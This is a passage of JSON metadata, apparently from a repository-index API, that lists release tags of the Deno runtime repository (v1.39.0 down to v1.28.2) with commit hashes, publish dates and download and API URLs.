url":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.